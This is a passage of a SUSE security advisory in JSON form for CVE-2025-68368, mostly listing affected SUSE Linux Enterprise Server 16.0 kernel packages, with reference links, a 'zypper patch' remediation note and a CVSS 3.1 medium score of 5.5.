"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68368",
"url": "https://www.suse.com/security/cve/CVE-2025-68368"
},
{
"category": "external",
"summary": "SUSE Bug 1255527 for CVE-2025-68368",
"url": "https://bugzilla.suse.com/1255527"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
